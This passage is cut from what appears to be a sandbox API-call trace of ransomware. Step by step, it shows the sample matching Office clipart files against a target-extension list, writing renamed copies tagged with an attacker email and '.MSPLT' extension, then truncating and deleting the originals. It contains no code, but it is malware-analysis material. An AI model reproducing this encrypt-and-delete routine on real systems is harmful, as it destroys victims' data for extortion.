(lpString1=".xlsx", lpString2="_.WMF") returned -1 [0307.798] lstrlenW (lpString=".ppt") returned 4 [0307.798] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0307.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0307.798] lstrlenW (lpString=".zip") returned 4 [0307.798] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0307.798] lstrlenW (lpString=".rar") returned 4 [0307.798] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0307.798] lstrlenW (lpString=".bz2") returned 4 [0307.798] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0307.798] lstrlenW (lpString=".7z") returned 3 [0307.798] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0307.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0307.798] lstrlenW (lpString=".dbf") returned 4 [0307.798] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0307.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0307.798] lstrlenW (lpString=".1cd") returned 4 [0307.798] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0307.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0307.798] lstrlenW (lpString=".jpg") returned 4 [0307.798] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0307.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0307.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0307.798] lstrlenW (lpString=".doc") returned 4 [0307.798] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0307.798] lstrlenW (lpString=".docx") returned 5 [0307.799] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0307.799] lstrlenW (lpString=".pdf") returned 4 [0307.799] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0307.799] lstrlenW (lpString=".xls") returned 4 [0307.799] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0307.799] lstrlenW (lpString=".xlsx") returned 5 [0307.799] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0307.799] lstrlenW (lpString=".ppt") returned 4 [0307.799] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0307.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0307.799] lstrlenW (lpString=".zip") returned 4 [0307.799] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0307.799] lstrlenW (lpString=".rar") returned 4 [0307.799] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0307.799] lstrlenW (lpString=".bz2") returned 4 [0307.799] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0307.799] lstrlenW (lpString=".7z") returned 3 [0307.799] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0307.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0307.799] lstrlenW (lpString=".dbf") returned 4 [0307.799] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0307.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0307.799] lstrlenW (lpString=".1cd") returned 4 [0307.799] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0307.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0307.799] lstrlenW (lpString=".jpg") returned 4 [0307.799] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0307.800] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0307.800] lstrlenW (lpString="BL00923_.WMF") returned 12 [0307.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0307.801] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=6256) returned 1 [0307.801] CloseHandle (hObject=0x3e4) returned 1 [0307.801] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf")) returned 0x220 [0307.801] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0307.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0307.802] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0307.802] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0307.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0307.802] GetLastError () returned 0x0 [0307.802] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x1870, lpOverlapped=0x0) returned 1 [0307.805] WriteFile (in: hFile=0x530, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x1880, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x1880, lpOverlapped=0x0) returned 1 [0307.807] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0307.807] WriteFile (in: hFile=0x530, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0307.808] SetEndOfFile (hFile=0x530) returned 1 [0307.808] CloseHandle (hObject=0x530) returned 1 [0307.809] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0307.809] SetEndOfFile (hFile=0x3e4) returned 1 [0307.812] CloseHandle (hObject=0x3e4) returned 1 [0307.813] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0307.813] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf")) returned 1 [0307.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0307.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0307.814] lstrlenW (lpString=".doc") returned 4 [0307.814] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0307.814] lstrlenW (lpString=".docx") returned 5 [0307.814] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0307.814] lstrlenW (lpString=".pdf") returned 4 [0307.814] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0307.814] lstrlenW (lpString=".xls") returned 4 [0307.814] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0307.814] lstrlenW (lpString=".xlsx") returned 5 [0307.814] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0307.814] lstrlenW (lpString=".ppt") returned 4 [0307.814] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0307.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0307.815] lstrlenW (lpString=".zip") returned 4 [0307.815] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0307.815] lstrlenW (lpString=".rar") returned 4 [0307.815] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0307.815] lstrlenW (lpString=".bz2") returned 4 [0307.815] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0307.815] lstrlenW (lpString=".7z") returned 3 [0307.815] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0307.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0307.815] lstrlenW (lpString=".dbf") returned 4 [0307.815] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0307.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0307.815] lstrlenW (lpString=".1cd") returned 4 [0307.815] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0307.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0307.815] lstrlenW (lpString=".jpg") returned 4 [0307.815] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0307.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0307.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0307.815] lstrlenW (lpString=".doc") returned 4 [0307.815] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0307.816] lstrlenW (lpString=".docx") returned 5 [0307.816] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0307.816] lstrlenW (lpString=".pdf") returned 4 [0307.816] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0307.816] lstrlenW (lpString=".xls") returned 4 [0307.816] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0307.816] lstrlenW (lpString=".xlsx") returned 5 [0307.816] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0307.816] lstrlenW (lpString=".ppt") returned 4 [0307.816] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0307.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0307.816] lstrlenW (lpString=".zip") returned 4 [0307.816] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0307.816] lstrlenW (lpString=".rar") returned 4 [0307.816] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0307.816] lstrlenW (lpString=".bz2") returned 4 [0307.816] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0307.816] lstrlenW (lpString=".7z") returned 3 [0307.816] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0307.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0307.816] lstrlenW (lpString=".dbf") returned 4 [0307.816] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0307.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0307.816] lstrlenW (lpString=".1cd") returned 4 [0307.816] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0307.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0307.816] lstrlenW (lpString=".jpg") returned 4 [0307.817] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0307.817] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0307.817] lstrlenW (lpString="BL00932_.WMF") returned 12 [0307.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0307.817] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=19476) returned 1 [0307.818] CloseHandle (hObject=0x3e4) returned 1 [0307.818] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf")) returned 0x220 [0307.818] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0307.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0307.818] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0307.818] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0307.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0307.819] GetLastError () returned 0x0 [0307.819] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x4c14, lpOverlapped=0x0) returned 1 [0307.822] WriteFile (in: hFile=0x530, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x4c20, lpOverlapped=0x0) returned 1 [0308.228] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0308.228] WriteFile (in: hFile=0x530, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0308.228] SetEndOfFile (hFile=0x530) returned 1 [0308.775] CloseHandle (hObject=0x530) returned 1 [0308.785] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0308.785] SetEndOfFile (hFile=0x3e4) returned 1 [0308.793] CloseHandle (hObject=0x3e4) returned 1 [0308.793] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0309.483] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf")) returned 1 [0310.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0310.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0310.612] lstrlenW (lpString=".doc") returned 4 [0310.612] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.612] lstrlenW (lpString=".docx") returned 5 [0310.612] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0310.612] lstrlenW (lpString=".pdf") returned 4 [0310.612] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.612] lstrlenW (lpString=".xls") returned 4 [0310.612] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.612] lstrlenW (lpString=".xlsx") returned 5 [0310.612] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0310.612] lstrlenW (lpString=".ppt") returned 4 [0310.612] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0310.613] lstrlenW (lpString=".zip") returned 4 [0310.613] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.613] lstrlenW (lpString=".rar") returned 4 [0310.613] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.613] lstrlenW (lpString=".bz2") returned 4 [0310.613] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.613] lstrlenW (lpString=".7z") returned 3 [0310.613] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0310.613] lstrlenW (lpString=".dbf") returned 4 [0310.613] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0310.613] lstrlenW (lpString=".1cd") returned 4 [0310.613] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0310.613] lstrlenW (lpString=".jpg") returned 4 [0310.613] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0310.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0310.613] lstrlenW (lpString=".doc") returned 4 [0310.613] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.613] lstrlenW (lpString=".docx") returned 5 [0310.613] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0310.613] lstrlenW (lpString=".pdf") returned 4 [0310.613] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.613] lstrlenW (lpString=".xls") returned 4 [0310.613] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.613] lstrlenW (lpString=".xlsx") returned 5 [0310.614] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0310.614] lstrlenW (lpString=".ppt") returned 4 [0310.614] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0310.617] lstrlenW (lpString=".zip") returned 4 [0310.617] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.617] lstrlenW (lpString=".rar") returned 4 [0310.617] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.617] lstrlenW (lpString=".bz2") returned 4 [0310.617] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.617] lstrlenW (lpString=".7z") returned 3 [0310.617] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0310.617] lstrlenW (lpString=".dbf") returned 4 [0310.617] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0310.617] lstrlenW (lpString=".1cd") returned 4 [0310.617] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 68 [0310.617] lstrlenW (lpString=".jpg") returned 4 [0310.618] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.618] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0310.618] lstrlenW (lpString="BS00092_.WMF") returned 12 [0310.618] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0310.745] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=7974) returned 1 [0310.745] CloseHandle (hObject=0x3e4) returned 1 [0310.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf")) returned 0x220 [0310.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0310.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0310.746] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0310.746] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0310.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0310.747] GetLastError () returned 0x0 [0310.747] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x1f26, lpOverlapped=0x0) returned 1 [0310.764] WriteFile (in: hFile=0x530, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x1f30, lpOverlapped=0x0) returned 1 [0310.766] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0310.766] WriteFile (in: hFile=0x530, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0310.766] SetEndOfFile (hFile=0x530) returned 1 [0310.767] CloseHandle (hObject=0x530) returned 1 [0310.768] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0310.768] SetEndOfFile (hFile=0x3e4) returned 1 [0310.772] CloseHandle (hObject=0x3e4) returned 1 [0310.772] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0310.772] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf")) returned 1 [0310.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0310.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 68 [0310.774] lstrlenW (lpString=".doc") returned 4 [0310.774] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.774] lstrlenW (lpString=".docx") returned 5 [0310.774] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0310.774] lstrlenW (lpString=".pdf") returned 4 [0310.774] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.774] lstrlenW (lpString=".xls") returned 4 [0310.774] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.774] lstrlenW (lpString=".xlsx") returned 5 [0310.774] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0310.774] lstrlenW (lpString=".ppt") returned 4 [0310.774] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.774] lstrlenW (lpString="C:\\Program Files\\Microsoft 